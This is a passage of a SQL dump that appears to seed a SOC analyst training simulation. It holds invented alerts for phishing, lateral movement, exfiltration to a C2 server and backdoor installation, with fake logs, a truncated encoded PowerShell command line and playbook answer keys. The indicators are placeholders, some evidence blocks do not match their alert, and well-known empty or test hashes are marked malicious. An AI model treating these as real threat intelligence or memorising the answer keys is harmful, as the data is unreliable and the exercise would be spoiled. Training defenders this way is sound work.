Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1073, 'Encrypted File System Detected', 'high', 'File Integrity Monitoring (FIM)', 'An encrypted virtual file system was uncovered on the host machine, indicating potential advanced persistence mechanisms deployed by malware. The presence of this encrypted file system suggests attempts to maintain a stealthy presence and evade detection.', 'Persistence', 'T1027 - Obfuscated Files or Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"FIM-20231015-023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"enc_vol.dd\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"file_creation\",\"filepath\":\"/mnt/vfs/enc_vol.dd\",\"action\":\"created\",\"description\":\"An encrypted volume was detected and created on the host system.\",\"additional_info\":{\"file_size\":\"256MB\",\"encryption\":\"AES-256\"}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash not commonly associated, potential zero-day.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"enc_vol.dd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Encrypted volume used for persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1074, 'Lateral Movement Attempt', 'high', 'Internal Network Logs', 'An attempted lateral movement was detected targeting additional GSM components within the network. The threat actor used compromised credentials to access multiple devices.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"10.1.2.15\",\"destination_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"event\":\"Lateral Movement Attempt\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"gsmlib.dll\",\"details\":{\"auth_success\":false,\"target_system\":\"GSM Node B\",\"method\":\"SMB\",\"credentials_used\":\"j.doe\"}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash observed in suspicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gsmlib.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with lateral movement attempts in GSM networks.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"clean\",\"details\":\"Valid user account, possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1075, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) Systems', 'Sensitive data has been exfiltrated by malware to a known command and control server. The event marks the completion of the espionage mission.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:06Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.12.45.67\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"filename\":\"classified_docs.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"malware_name\":\"APT29DataStealer\",\"c2_domain\":\"malicious-c2.example.com\"}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Unusual data transfer activity detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Match with known malicious hash associated with data exfiltration tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1076, 'Suspicious Email Phishing Attempt', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected, mimicking communication from a known partner, attempting to lure an employee into opening a malicious attachment with the objective to gain access to ICS vendor networks.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"e1d9b2c4-123f-4a2d-bc77-9e0f5e2d0b9a\",\"sender\":\"it-support@partner-company.com\",\"recipient\":\"j.doe@company.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update_10_12.zip\",\"attachment_hash\":\"3d2e479b7e1a2f7c3f5a9f7a2d6b3c4e\",\"sender_ip\":\"203.0.113.45\",\"internal_recipient_ip\":\"192.168.1.25\",\"malware_family\":\"APT29\",\"detection\":{\"method\":\"signature-based\",\"description\":\"Known phishing campaign associated with APT29 targeting ICS vendors.\"}}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@partner-company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e479b7e1a2f7c3f5a9f7a2d6b3c4e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29-related malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with phishing activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Phishing Attempt\",\"date\":\"2026-02-01T20:32:22.782Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1077, 'Execution of Reconnaissance Malware', 'high', 'Endpoint Detection and Response (EDR)', 'Once inside the network, the attackers executed a custom-built malware designed to stealthily map the industrial control systems and gather configuration details.', 'Execution', 'T1049 - System Network Connections Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"EXE2345\",\"host\":\"ICS-Server01\",\"user\":\"ics_admin\",\"process_name\":\"recon_malware.exe\",\"process_id\":4521,\"file_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"destination_port\":445,\"protocol\":\"TCP\",\"action\":\"Executed\",\"malware_signature\":\"CustomReconTool\",\"file_path\":\"C:\\\\ProgramData\\\\recon_malware.exe\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple reconnaissance campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a critical ICS server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash matches known custom reconnaissance malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"recon_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Detection\",\"verdict\":\"malicious\",\"details\":\"File executed on host, known for network mapping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1078, 'Establish Persistence Through Backdoor Installation', 'high', 'System Logs', 'An advanced persistent threat was detected installing a backdoor on critical systems, enabling silent control over compromised systems for prolonged durations.', 'Persistence', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"process_name\":\"backdoor_installer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Backdoor installation\",\"description\":\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File recognized as part of a known backdoor toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin user account used in unauthorized context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
